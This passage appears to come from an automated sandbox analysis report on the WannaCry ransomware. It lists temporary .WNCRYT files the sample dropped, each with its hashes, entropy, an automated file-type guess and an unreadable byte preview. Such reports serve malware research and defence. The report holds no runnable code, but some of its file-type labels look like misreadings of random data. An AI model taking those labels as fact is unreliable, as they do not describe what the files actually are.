Preview:	i....}.DfN./.....H..T.h-.,.........v..#.:....U....G..-.....(&.Ew.&+..v.]./.?.....;.....Hi.H...6.4-....B.s.CF.M.W.....>...m.F.Y(.._.zTD..A..A.p.N.h....c....\...._...H.=.X$..8.j...(y.[.>.......f....=.,.?..B.At..._...`rb..Y ).w.5EVyG....x....../.b.e.^...9.p....?..b\|>+:...K..f{v....7.ON/8........w.....~....3...!1...E.\|...b......{.......s.K.y..4.....6...,...==f..j..A.._F.5.P...::..j.~..4R....b/...sZ9IqG...8..0.....3....7...5.g7z..&.........}.A...`..7....N......)n.)...sh..Pn....^I:...=.d.zZ...8.~3.S....S...)....PsJ9..P..N.....f.Wtu.<...v.\|d..Be..+....C[b.o.J...-...)..hQ.{.]..Z1.;..BE...'<.%=...>.Y.{.lu.y..B.)GwM..HP....9.rf)..o.)..W..u...-w...W.A.d..S...N....i.^.o..5.....q'J......y..6s}+zS.7X..G...).xXF-.V.Xi..\|.!...\|..".e..j..B./.`3.Pr.......-..N..`....:,pt.#H..%.9iYO..'O?..~...5.L..W.l.D.k...z.p.r...s.F20...i.C....A...7..s\.A.7..^...pE...+u..z.V=B...@..,%...........b....s..8.OPb.............E=...M..L..l.\.....3q.>d..Ee}..C.,.7t......].}..

C:\Users\user\AppData\Local\Temp\2.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.824482472945718
Encrypted:	false
SSDEEP:	24:0oXyTWw3P2kpbVfWbvtiOId+GfE1xh0K7WgicPO:rXyz3+YVCildlfGX7G
MD5:	4EC95C15178D817C77FC78CF23834890
SHA1:	75B12F7770C4EAEA6DE2D931D5086E6DF3B52FB3
SHA-256:	EBB0D33374AFB40617AF7EEB6AE7A94B659120808D33501E9D5FF5FB57025C3A
SHA-512:	092EC5E1DC0AE949E391481252433263DFFC5E887E7105BD653A66E0E0DE43F90C3CA8C1B9F07215406BD75CC8BD4EFAA327B6645EEF80FDA34BB1A31E0D519D
Malicious:	false
Reputation:	unknown
Preview:	.d..._....P0..@.m.B..L<...5.,&.A...l......<....0...=...Ak..;....z^.X........Z.K...a...\.y....^.}..8.a...0....5.w..[y..t.b.M-....zP..]..\.Be.}....$/\.....B...E<C+..ND..+.G%.3..B..E..=.:a.p.D..0....".k8..5.3..M.W<n.^.6....../.'..W.-2f..wS..N..<...uN:.Ew\|.n.k^l...<.\|6 .X......k..B.$....."PO;p.(.).j.`.E...... J.....EUh.u.%..^....\.Y<.d.Z.TOi.-j:....Tz.MaY..gN./.c.U^,D.q?.w..d.........p.;Yi..[......(..\..,bF..;.F.b.G...t..X].....8...:G....8}A.......4...[.3%.........Y....i...y....%3.e.6....Y..H...F.Z..0....k@O.....`....(...2...l..bL.x..^..]....v#......;29h&A...2/%..Q..oz..h@....$..\\+N.I...Z}#..s.BqA.xR.-.{[....Z_:.>.....Z0...v...i\.z..H...s.qi..-.J.......~`J...OJ.....W".W..Ss.)..w1..@........N.@C...9G...d.......A..6~x...!H.(..m3b.l.......C../.Y......E\.>......'ur...IE..j".t...TQ..2VH.VI>.....M~...'.O..wW......\|.&.....$Z....x;..,...C.*...u.2.&..xH....r.&.E.L..L....p...I........Q\.w...e.[....~..8..Tr...\._.....$.[o...2..K...p..3R

C:\Users\user\AppData\Local\Temp\20.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.838062896968061
Encrypted:	false
SSDEEP:	24:5pnR8KhhmOL8qTK145wWinopwKRUN4M/bJJUG9ITCAuFeOx:5pO747vRU+HeIoFe4
MD5:	330B5ED0FB6E3A91462C9BDAD33ACE72
SHA1:	F1622CBC7989B82644175DFC33559D0B44A04DF3
SHA-256:	DD269D641BF0981A395ECF0914E0048F9122F0DA77A1F3438F3AB96C6D843D6D
SHA-512:	A9DB982847BDBB8065B0F22196D80A11B0777CC68E3B0009A75CC9C3BD7DA255F151700AE0DFE1C6164AC4F814E241BF5AB0B7BC49CFCDA81EC6FA9D75E15EE3
Malicious:	false
Reputation:	unknown
Preview:	.D.$.7=..=i.........[.....".s....n#......'.....e......+....>..M...3.../.Qg......`.f.%...'...,....F..........K.Gp.......5.b....b.\...Oh...^....i=..=...ktp..ga.6..t.}.:..V...`.f.i....}.G..x.....\R.....r...7D(..BW:H[..........i.x..8.L..E........p.....q..P}.=.p.....81./V......".5.....{&..Y..5.{Cm...]P....>4.f .d[...1.._...LT(.L..j.<:..p....[.KC...2..zo..2%)9.2.U..6;.em...%.v,.V..K8..b&..R..%.......H...C....0:.....=.+1.....TU.........3.q...5....u..c...A....n?...`?..-c..u3. ...D(...bece..W....K.....BiZ.<.gZ\|...G>......:.3..F4J.=..._.......x6l.T>...0._....,....t..h..WH..jj..S...s8.....O..%..r...d$..........#4.M.. .J....l=.s..[WD..U.^K.~?A...yN...<.2..1}. ...}.I@.c..:7..1p.N.r.o[.3S..i.<......]..z.t"+...:.@..^..).....LTNU..}.I..<...]...h....My....._>...&.g...bf6.K.......P.oP.s]NV.c.&!.......9.x.......4.N..A.v....j..#$j.....v....5_=j...e]8......[...k.sa.p.\|!s1..3.ur.).t?."J0..b....C..Z)..,.b.4....4->[.t&.......w,~c....x.\.W?.ec......#}.ek....*.....

C:\Users\user\AppData\Local\Temp\21.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.794726989426592
Encrypted:	false
SSDEEP:	24:uNRjDA4yaGBCX54b+HubGKwwAxdSgfNwRCPHHLBG4EtkqFGX9jG:qFAarXmbquCKwjNPP+EXtG
MD5:	114DF5B605ECDB765CE50B3466D0E600
SHA1:	B8517B6067479B2F524A2F7599A234C3C312B1E4
SHA-256:	D9FEC8AE80FC50DAFEFE1F4376A484AAF4F37FCBDEAF9AFDAD998E239EEAE950
SHA-512:	39B65AAF8BFC5975D8EE3148343E4B3408FE55A20A1C31EFD55E55CE5E1281B720782373E137888CFD66B14BBE1B762A97B449ACF80A326ACEC3A25D8C939C94
Malicious:	false
Reputation:	unknown
Preview:	.....g.dd\.....3Y...@..2....3}.d..3..h....\.AO.........X..w.JGe.I.......>..?!.Kb5R.....Uz../..2.l.M.w...p...EC..!.......Q......(.[.`'J.r..Q.P..(.D.....JN.BB.I.}....!.<.N...A...`.....w.h..g..A...T_].-..d..P3o..r.I.c>a\.M......-.....l5..\E............XF;.....[...+}.jm..:.9.D..<.....5.<.....q..y..8..W.+...(PPb#+a._i..v.....b.;.H.+.H1.b.......c....1%V..../. u'^..... V3v..\|[.P{.s.5..V4......QF$... M3.Y_.?Z...O.}M.~...x.......+..$+..;.6},.......E....)._...g..%.+..O.Cd..s.'..z.=:.d.J....<.]D.VW.j......h.s.@N..q.I...TUj....\|.s.QH....6~...fZJ.....).t.m. Q..I.H>"&_./....~..]..;.i.n..8.....5..Wc..R8_..HHc....B...0.\|..kF.Is.U...:f......Z..#.g@.._.....;.LpA...{.........g.ma.;.V..........B..x.[.......;Sx.4.t.<8.....pf.pe...LD.M%M..x....9...E.E(..`...}....F.Q...A....3<.P.._$.aJ... 8.....h......X.NO,.6...o;.l.J.`:H...4....5c...2F....3.a#JZY.2...C...ojT....j....%..#?..h...4p$.4....p.&.........J.-....L.ko.d.W...r\n...,\..`.\..L.V5s..-x2...^^

C:\Users\user\AppData\Local\Temp\22.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.811361538152819
Encrypted:	false
SSDEEP:	24:iVNff5aQ5VqYLzSGGfvWTAr7q5NtDiWmh5Ng4UJ:6N5aQ5sY5aWTAr7q/EdfUJ
MD5:	A423A6E5A8D1A6FF1F0A1C29186CE006
SHA1:	5E41FF707B7B7A09E22022975506E819C3245419
SHA-256:	9D4CA689CA935CC7E70B7CE3D1743A2B623E0FD8C6775BEAA0892C83F1ED0B7E
SHA-512:	86FDF86055DD9E0AEA514DC13D6EF4EF0A6C731B0E94123171B5E37F2B5E10703A3BF3E42E97A79077FF3956555600587B360F91E099BF38F5D1A3798AF8A230
Malicious:	false
Reputation:	unknown
Preview:	..3.]B.~.A"q.e......".lge...:.....o...!../....=.....0........jo.4l.7..t......]..R.......o..x.'.K~\40....;rl.b.)eD....9oo.[7.PN_......t...Tw.._I=!...H.1.......I5w.. '...L....B.:...Hk..G..&v...2H%...1..1..L..#a&bf....t..r!.R..C&.^....E.I...\~..8...E.W.'...S^.....Q.+.+Eg...dV{.,..U.Sg.I0....C.-.N.,!R[uL.So.~F...g.C....t\|$Y-....$_.KoO>......)..[..r...}...O..G.W.t.Q.8ml.{.Cd...DM.Z.v..[.Y6&.M.2.......N... .k. .\\...{!..{..e...{..Z.lf-..\90.{.C.....#......zqe.1..r.Z6.\|!.j..I....(H....]..F..-.5..L.P...`Do.f(......%....W$M.,......=A./..N..4...q....T].7vtD...Aw5S.....o....b.^G...g..An.Q0...OYO.S.%.e..........}...O_.....\|.h.'...D_...H\|c.7T..%.FpH..h[..w1....6..."1..@.lyD..<.5...Ij.. 0...{\........U...%.vi..L'!....Qw...."`}.......}..e.......E..-+.P..c$.....?...b.....9Xt.........@..~L.....z).....!...~e.7.C.?.k%......+......<.I.r....'X1...p[5-.Pl.FeE..........<.L6.g1..7.\|.\.Y...Ml....m.3._l...?..w..m.3.q.R.3..0..........0.........A.P=...1.>.3u.5~d

C:\Users\user\AppData\Local\Temp\23.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.813502207412918
Encrypted:	false
SSDEEP:	24:fK99GVoWiAmD9qJHZlYyX5EABUBH7tsos5SLNL:CGVB1+9qJHx5UBeosgR
MD5:	CB052D30BBE8BF5BC8C146AE9562180F
SHA1:	D153C4B69840A33D557D028A4D4955B7A5332C25
SHA-256:	90382984E100BA6201D8DCDA5E11BADE7F8EC6D531F4F4E7A111C60746F47904
SHA-512:	D3761D58D3EFC74405D1D475CA25408764F2C250F6F39E29CA724F9BC5E6513E8E9AF82E6D9AE66CF9EDEBBFF720ED236FCB67586AF6E61B44A3D3BD2CA2D281
Malicious:	false
Reputation:	unknown
Preview:	u....8.\|.....t.......?...4.>F.G..z.....v)...w./!Ve.....S-..NGZL.(.'CL...X.44..B;..;i..@i....A..E`....8..`..b....Z..i{..A.U.....Ft?6D:....'.......V....+o.....L...R.2......n..?w.!2......F.......mb.2x6..\|.S`q2F..G...#....B=k.4..m.U{G.9.;.4......#...+.d.....{..k..e...Q4m).qI..&7W,a.Q....q....N.zq.U.)h.`Y......EW.p.}%3..>..<....P.KS..t.y..N=..?Pn.X.o...E..$y..nr^...].........G.DT....w.O.....T..n.Ud.^.......=.P.%.....%....F.._UQ...~...:.K..X..b...y...%..5..B.x._X.H`..!....s.....^8.8c...7.r.h...h....h.-%....1?..rU8..+.....-........%.-o....I....=2...U4.;E..~..+..ED...6/.IUS..B....(.......Mn)....m....*.. ...Elx9..}.K`a.&%...d..l..w,..V.r....g.2...NN../.9.x..[f..y~...6..!..9...A.QDY.U.,X_.@Y..........X.6.M.O.j.#.R. ....:..\|..........6PJS..;.2....8..'.....{UTT.U.0b..r(vJ....4..#].pBN.%M...y_.S.5b^I.....6G..... ....V.~..zb{.V.Y.&.r=..].rR].m.g.t1...)0.f...DX..Y.+?:.G[C..........s,.U.N..H8.........8g..rt..12..Z..m)"..) (...K

C:\Users\user\AppData\Local\Temp\24.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	320
Entropy (8bit):	7.309535059000209
Encrypted:	false
SSDEEP:	6:omUe5TJQO3XzUctT9RZlIksL6amo3N7WjoJBAxfR+Gpm699v8hmKMFpQ9TNPK0n:oERJQO3XzTPukg6t5o8xfR+GV8wKQETR
MD5:	D99DC62BEA4A72339F825748C68718D7
SHA1:	C64A5CC4CA69D0987D0CACD4F88A02E513B5CBC0
SHA-256:	40638110F524B38CF71DCD0A3E5DA3E2FB5CE113A9F1865A0B54DD67D8BC8C1F
SHA-512:	4B34DA89E9504A5E83AE21D9AD67013C1A74ADC840315249F74B445C9FEFB7638528F41DF64FC5486A5E71953BE25FE7AD4E2ADCC521879EAFE1F34168C8F9C8
Malicious:	false
Reputation:	unknown
Preview:	L.....t.m...U...H....ny..AA...~b#Y..b..HW.Y.......S..B.HJ.5...a!...-..W>.....G..XcK..k.U8......8XQj....+,..b.O.f^..5.....k....,V...I>.9.x......8..9H.....(..d.........O...;....!M^.U.).G+..b..O.J....9(...'.8....:..[.L.........~x..E..........o4.^...C....D...n...48.i..*...J..w[.<H!lM.....Y..5n.Q.d"..Z~

C:\Users\user\AppData\Local\Temp\25.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.802108679014321
Encrypted:	false
SSDEEP:	24:W6uxqqjVwXohs9ghHpleBaU20CBN3mmcSYyeoJBJDSumc6:0HjV+9ghjU200rwyegvDvmc6
MD5:	91F236C086E6DF7898D64F3BCC76BC5B
SHA1:	75321F95BD5A738E3EC47E21FD82C27EB14904B4
SHA-256:	57800C307B9D789C7654E0F35E0D313C0F2176F8DAB9D6E6BB7FF9FF6FFD032B
SHA-512:	D05FEC8657B599D38057759100482ECB2425A4FB52E434406FD5FBA86EA392A6C9E8C7AA61D8F89D3B3CC601ED0665875478D7B52F7632BE7A336FC72988F49E
Malicious:	false
Reputation:	unknown
Preview:	..}...l.O.9."....T.M.^.i..=ip-..R.\..D...x.n...`.q~-(....c7.b../........a0e.JjK.^m9...hd.G...J.s+..g[`....#0aO..'~=..?.]..`.W\|..ED.\.-...5.u.p...r.c\|@3.Q\|.mhV...;.x..s.....{. .C...}...:..Qd....a.R...{\...Ix..;..E...D..&g..a.U(.B^...y..M.?V..}..K..b.....KO`a.q.n.2.8.\...H .....T..K..L.Q......1_...M...R.f....z.e[.b..l....!.\|..Xiv2.Y...u.G.4+.5...lCd\|...kq.......D...e[...Sw.......x`\|......B....M@.7:%..R{........w...~....%2..k.Yo'.,...~w.\E>....I.....'.....ez.X.AN..u..L'..ZA..wx....0.K.....Y.4.}....._..C../ "e.v..Nl...F.i.f<.P>..G.}......l./......j+....~....4....GX.{Q(....G.E...n....G..C. ...Z.......=..N.....5~.RL`...4..8..>..!.........9..<.....$...){.0..J..b..i.k.:.e.....Q..e..... ^....ckn..?.h...,S:?.....?^iW.l`-..WLD....5.r...eP.74.S.^}Zs.].7N..hY.M.?..$......X.n-z.A....'P.E.P1.....1[....j...J.u....G.....i..DK..XF..{....^.Fz.'T..y:.$.[a.\.w........p]..<...R}.{..*.i.eR.+.9U.GS.;.y..Rq..gq.E.^7-.A..@3].......S.A.v...E...\|r.O_X...<.P..T

C:\Users\user\AppData\Local\Temp\26.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.80727764253739
Encrypted:	false
SSDEEP:	24:IZPyj9nkg3cfAYduTI8Ry/5MYT1etXVtbrcVDAFSZB3ZOT:0yjerhduTzKHZAV1rctZBpOT
MD5:	07AD3E1A62363EBFC78BDE99D5FDEADC
SHA1:	5024FF6F057304DF02CDFF6F5CABE88173306D09
SHA-256:	3A8747E929BC7AA358C6D93EDEBD47AF6FF046C46CFBA8081B719E55D0F21DC2
SHA-512:	D75E8D45F7D053A2E6FFF0F30062CB5DC23C4B672E153E48D49F5BCFF1F9BE85BA5493198AF2ACF5A61A32390BE085D26A2B98E9EF20E2C6E3219D812D750BE9
Malicious:	false
Reputation:	unknown
Preview:	.QXy..&..N....S.\|....z#..i+.x...w...!@5..@R.....y...............e5....J.u.!.L.p....k.H.....!./!..D5.D.F..2;<...o.!.U...JY.l............bm_..#...kG.~...FB..O..U.v..3..`a1l...b..p9)..P.g.t\Lj...0..ZJ.\|.],......j.7.>....c....l .6G....y.m.%.pGe.!..la`...3.Z2.f.x...m..g....=?8.QO../...........F.......O..O.B..k{....S.....X..\..m..C.C.D....V.....x.\.].-.R. .:id.p3.._.J.6.....T.[D......e..?a[7.4C`32.1.].&<..u..k..o....$v........i..mP......U.1...5...D.)gL.........(......;.......AD......)^_.>...6.d....D..p@M.4...=.....3B..6.)Xv..D.b.u....._M...... .r.....f.;..0.N8P...az. af...........xB....i&C....R..P...AH.Y.'.w....S..y...(&L.dI.....K .....X...h%._.K.J.....i...O.z..i..-=.....zO.N^.....oRV\|-..J.V.....i..=.]K1r.....8,...L.T...$..D..j.KlhP."z.r@(^jN.]..No......L..9..EW.Y....1.,'.UR....M.Q.$=...5.....#G.}KW..h4.q.l..~.....iW...%..gO.G.....b..!......K....3..V.k?..o>.....h.h....;S......5.*..V\>...[s.0..B..nI..pX..P..\%...D...\......h}M..&X.

C:\Users\user\AppData\Local\Temp\27.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.7947967935744575
Encrypted:	false
SSDEEP:	24:t6JLSkfVMg5mY4tRup/aWICRWqlXqzGspjqx51gWS1dOn:t6xtV/mzm/dlXqqsS51gxO
MD5:	D8A39A954B0E7CF98F325DB34F36A457
SHA1:	699DBA8D8CB68AF44BA8D20519CBDB2709EE40BC
SHA-256:	6F7F545C510247011E4C60917243918BBF8B95306C31E30F88C5B29EFC7D58E4
SHA-512:	55EDC0BA8FC4E0ED4B8FCF882D1C9F4B862CA2143DD8A36A0BF41A688DBD59671E864F169BDF12123F7EED15B2D549D5CB9030AB66FE2AD032EB9B898C5808D8
Malicious:	false
Reputation:	unknown
Preview:	v,..\..$k..#.....V..QD..M..e...S...e.0..;...qv; ....q.+_...P#....qC....b..A.b.^&......x.@@.\.\|Vb..e-T?B...$.....H=Y....\...^...e.."8.~.R8.~..\:Yl.x#53..~k.J.Ov.;..B....\|Y..).[.i...>..U.2..."..L....Tj.p..(~ .(.[...z0..9..Q.......F.c.D(..{p.tM'T...)l.......9;..U.....C.LG!_..m..&.R.t...i.L......q......QkN......w)~..3.s..)/]Xp..j@c................+.a>..`0..4....I...S.br...P....)...".>/..w<..X...T.2.k...L$.J.X.Z......'..,...U..Q........G...Zg......FVj..5.Wof.-.@3...X..p~.t.$......b...p..h8!"d..&.....v.:..RD5.....V...T..T......W..QK...[=...b.%...9d.t..c.z..%@.4rv.l..g..9...).'V.......\...i.s.....T..$.8.c.o..6J._..:...m8...HCdzi+A0.0.x..K.r..O......~.....ku3..s]L...R...P>.@.sqZL.v8\|.NT.`..&.,-,...r_.?.N]...b.......LU..gf.....02Q..&_-.....i....,.#p....]..0....,..{.W....As..<.....b..>..x..]..v&[.Z..N..:.r.pL.;..4.f..O.y- ..R...=)&....}.}....r..D...@{...........z7....?.......~9-..".y9.+....w]...r4?4.J..eexx.^.X..+.Sg.\"^...e.A..A..."7...

C:\Users\user\AppData\Local\Temp\28.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.809890560257679
Encrypted:	false
SSDEEP:	24:ZJsDurz0pmcKh1uTi4RY/fhAbJsUtBg9iVr/zIU3vYW5+ABl:Vz0pmF/u+4RY/fWFHtBg96rkUfYkBl
MD5:	E6C1C2EAD31A7BD0B0BC65B93B3B5B69
SHA1:	2E55CCD8653B05AAA82AF5BD894EFCA558A31B4D
SHA-256:	E8FD36221012092A714DC4DE21971E6314A00A67922629A21B1E431859AC108C
SHA-512:	824FDA21154A0667BC7DB3485DEF7AE2E4E7B79D7B48B4AE423E2F905DCF8F7D279F059BEF2F585CD42FEC589583BD69A73C1D5B8A68BD325AB61D6A5EDB1B6B
Malicious:	false
Reputation:	unknown
Preview:	<.....y.a\z{\.SW._...!`..> ..S......p..7@.cF.{6).q..L.x.y..&.9w....RboQ.&.;..Gi.u....-..../.V`...v.K...W#.......7?....Wd..G...{u..n......#....8...S...........{k+....p....X........s#H..o.p.._> V.o.9.&8..x....Lf..V...!XrP6t...V^....w.....e^..h&..k.\c..]...."..>.+N......LX\.@a:.R..}.X...eA...Q..'&{.."~.D. G.m"....e4O....>S..v..z)....?.M..2....1..k..=...#.F.s.%.L..m2.....7k.......-rt.5.Y..K.o{.......@..9.{.A.hi..7<,.M.[..Dd..g.!b...5....b..\.........b.bY.M4.X4vd..^...n.G.c%.E.H.Au..81s.o..E\|.......I...D.l...<y.R..#z%.@..LS.-......a.U....B.............(C.Zd....#9....?c......K.m.......Z....uw..k.....H...&JwYoyX.....L.R.5s..?....N........\-..W..X....g....H.jj.....)(nT......H&.r..%....o.N(.\).N.....y.... %.z.Q\..$...#J.Y.z.(..oe.l......\....`..8+..v...j~.r1...=....]A.+...Q......p.K.Or....P ....Ya...}5.c.......{:.?....;=......A...d4.o.k.....;DK(.\.=...eV..Q...<..@.K..............u.90;.p..dO..),........{....k..9.?}..........T#............`..vO:.

C:\Users\user\AppData\Local\Temp\29.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.817874316566713
Encrypted:	false
SSDEEP:	24:g3MglF8K9aIlP3UnkSGcz7+cc0P5P+yF6e4kvuOzHHmNS:g8oIIJ3UkSNzK70PJDo1OzHKS
MD5:	438AA50E7585C987018E8CCB43AD92DF
SHA1:	4584578530CDD817CCA61DBA69C3A2E4C67C2B4D
SHA-256:	CDBEAA599F098B0CAA334D5C619FDDEE197C013F99AD20DA14DF4D4535AFBF85
SHA-512:	EF63F232317D6C6FEFCF16DD4AC27DE687B5A6A416E49BD8D9CD076BA747E4564B232782BE39BDCD642F1C0636474F1840D099E5764FB07B20BE9D205BBF3865
Malicious:	false
Reputation:	unknown
Preview:	....{....o.X<...e..54.Nb.s4....O....a...<v,.../%m6.m..`..A....8.-qju.r.Z...rE.S<.P3Y..........yr.+A\|.....u...:....&hF.\...mhn.^.X......(...7A.N...8x.5..!..G..\..Q......N.s....~....o..#~..VC.?..e.0a.....5Y.A...B..C...{4..X4zWj/. g9.c`..h.^.i.T....3....+e..!...u........t..=..Z.P.c..).K{...M...2[.`.:0._wF.[......3...D..:.....v.WW.[.]1;S-&.l.-.1b.%.....8... }m..(........s..L..I'.u.H..3.X2u...........;....e..!u..s..B..l.u4.z.0.X..u...._.........Zc.bs....F7..^P..1......Y.....).?..Rz...V=...zk.....63.......x.).9.6x.d..-q"$.04......G...g....[..A..G0.J[?.ng...Tf.&.)W.%>e}.[<.).uy9....9eM.{O/..%75iJ......nF^4.+...!...y..A.5N........r...._......Id....doV...QO.-.....7.&.M.DH.2.~.g...~.eV.c...kR..?S.A....d...q...<..Dg...s. ..I..,.#.k..3.}lV..bh"Y..Wu..M.P..z&.{...I5...q..A.Wj.....6Cw2.Y.T...3>R..o..Dr.1@....$...a?$.-.a.Nz....QPx.0.....g..*..QQ.P\.)...N..j...Z..F.28$.^L...U.(...I.E.t...S+BE...:.=.W.#.P...`...>:!j..^k)...V.k..3...l...

C:\Users\user\AppData\Local\Temp\3.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.801892572315549
Encrypted:	false
SSDEEP:	24:wWatXRDOzUxOtCCTSRCmcsVjeciu5ir7QYYa1OZ:VatXZOz5pTYCmcspeC5ir7yn
MD5:	8F311F40B242195EBB0D2EB8C4D1F79F
SHA1:	04000F515EF3DA4491F862CC3A69C349124C138A
SHA-256:	029AAD35C246369ED6F677637117CE269FEC513547D61C96091F482913D6B5A9
SHA-512:	36C02E8902C7C8A479378CA0E4EA5FB49F94B0824F6CCCFBE2D7CEE58D3E0DD21EB175E531E0E9EE8D05FA002A93B302E7C8A2B6EB6D864F154A07643EF2E8F4
Malicious:	false
Reputation:	unknown
Preview:	.ua.....5,~A..e..}.._.6..C.....L....$ .....&\....J...bZ....HR..hUG.<..O#..h..$.._E.vU."..uU:W.E.Db..w......w.....e.^.6..I.".Pru(.p....^@..u;,.4.8p].Vo>.!&4....d..Te-.,......E...._..1...6S<CF.A.P......f....Z.....d....<.\|U....iz.?....n.= iz..W.j.).k6Y..>R......]+QA..x.?y..$..)c;..Q:.....z..J\-p.D..v../C..n.....3.....]...S.r.....y..{....3.U..s23.-..b..7.....}....0._....1).'.N,...<.?..S..(.$..\.@..%bk..~F........!.r....dOL...)%.Tw...k..b..?...TB../.w7P..=...:..z..p.SX.=.9.7._...D..i_....!a.R.a.VJ..Uty....[....g.r4]:.....\6b,.......7y.vt.Q<m.\A....s.E....YR....d...AQ.&.2......XV..A.,...../l6u.0.v..B...7/W.&.#..IA......Gr...................Z.h...I.'}..$0....HyHw.#.^ua...E.......5y......j.l.sd}...+......F.[..7.;..{)..f.....R`._....A$l.........e...1\\.2H...I.I...k.....RQEDd..k...(..:.R......h...&..."u9.&.P#....WL..&......4O..D.L.$...1.a^..9.}.2(.6.:....F1]P.}].Q.8o........].......[...xs..B....*..B.V...........V..-.YV33..............

C:\Users\user\AppData\Local\Temp\30.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.780668914365367
Encrypted:	false
SSDEEP:	24:39o5SJA8m5odOHCO7MHiPD1fhK6rGMk+J4+s7M8og847u5Myy3v:q+AedO/7YiPVscG4i7Mr4C5Mv3v
MD5:	F9DCA7AE8BC129CEA033C41D8D5D62A9
SHA1:	B662A092218C9CB045D40CE12371281BD63F3243
SHA-256:	A72C7501E987CE67813C58B44D86C14CCCBEDCF2F194D016BE5629B31DC5E810
SHA-512:	DD5737EA20E5158AD1CE1D53635EEC43536DF8AF6FB836A2C28D7AEE7CD51ED7E92C53A4C2E20CED94FF70F231453D67E8EDD5AF0CA953FE153138353CDDD311
Malicious:	true
Reputation:	unknown
Preview:	.6..3.w....D.\|...U\.m...s...i..<G.P.a(..D..E.........b.p..?..j.Ed......U~...$G..H~..l.7\|.$.0..2...p...g..N0...Cgm..W..,`!..+.`=.!.X.~.....` .r....ey..yo,v.........J...T..../y.^s...\....\..4..:..k....!%u.d..,W:.....>.r.z.\|Cuv.....j..oT.M.....%:..X...y......l...uV.BV.aO.k..A.h....dPh.6..).Y.6I..[.d...".V.....s\|>.u...f..(%+..wB:......s.....p.0WM....\|....q....m...........w>!hbs....$......Az.h.flk...g..g....J.c.....\|..m"...e.ijX.D.8kn........:.=...$vzbT.....W.#7..Z.R..8.#`C..R(.....~].X.....@..Z@..!.m".$....Z.2{m...b..>#.\|j.^...l.5K.....]...u....&q.Q~.. .7.5,..M.(....D.~../$~.V...R..l..-OR./"..........k.@-..M0..\|.%.;g...i..C....c8W."..E.T..\A...g....l..s..(...mj.1e.... r...B'.....5..&..Z.x.St.B...N.;...x.w....wOG."+#...%U...B..."z$..../..A_.j...........T...&..HypPH.a).........Tp.KTD....x..X/.Y...$%.$..P.T.r...bg...... k...m..\|#T...qd.h.&..L.\|..q;.Pr.x.q.B.`2.I...v.......$u....G...U.Bfy.*..1R0I.....s~..aa...7.R..M_...)x...%.[w.].".......

C:\Users\user\AppData\Local\Temp\31.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.804259779094444
Encrypted:	false
SSDEEP:	24:q2Scm9r9kL4pbcLLqAzryXJO7xGqX+f6AA6ZTXpX:qmm9JUfLqAzOwMqOyeFpX
MD5:	5DF2F48E6F3C5E8F70CD0DACE80DA750
SHA1:	E04A4D00726CE080C744FCBDE1CE00A6301596FD
SHA-256:	B18DCB73623AE3B4525ED8224E0A4930BBA3603899A8715828B09B00BD2DBA92
SHA-512:	A878A5EA766E44DD4F3F8FECA459C3E636D0DD39A0ADB83933857CC5DCDDFB361AC3C382A182BA1ED7872C0C22CD1D500BD0D3F2158CB7D49AF911ADBD407E22
Malicious:	false
Reputation:	unknown
Preview:	6."\|.2..o..nk.8.o.t.{\|O.....a#.1.y...8..,..../E.....j.S!i. 6z$.PTn...'T...\|SQ..'......1i..-....w.Umo3..w.......C.;..._...,....St.r%.N.?.V..Ao..0Ch......e.bM,.lx.77..Jz....m...@.,.u.-?.c<.2..)V/..-.Q..........[.(Q.x......g.3F.H....$....UvN...iwY..=7..J..!...r.......:.?.{X[yD.Ew...5.......$l_...>...l4d..>.4\.p.{V[y}..:WPC..1....[.....m./U77......dI..c.p..i.Hi3.?]u. ..M.......B...&.lQ.,..5.a......P......9=9Y.......@..y..T.....rf..T.0O.p.`...4.n..JGo.w.....0].....y..#..[.-.Y....c"W}....U.{B..r.\|...M2$.p.Lk.#...?.....qAg..'.dd(:C\Y..c.r.......S...2......5..w.....S...:.... ?..bY..cg.,....\|7.qR~.._.........w.}.Y...........9...\a.........._.....x.o.=_B.r.?.f..X.>m..5..t/p....i..`....=.....:A....2e.....}.[U._..HPZ..3..=.....x..Y.. ..n.j.yXj..g..O.L.....U\5x>..DnVAu\..T2..7~.DA.;..i.<.1.PU.+t.....=.4..@.L#..D...2Q=......W.).J..'[.~....5.T..z...Iz...a.x.,C]`.$x..A.).0V.....L.$.{.^.^90.u:.[.n....dVc..a...4...U.A.....$r.L....6..r.mX.(px....

C:\Users\user\AppData\Local\Temp\32.WNCRYT (copy)

Download File

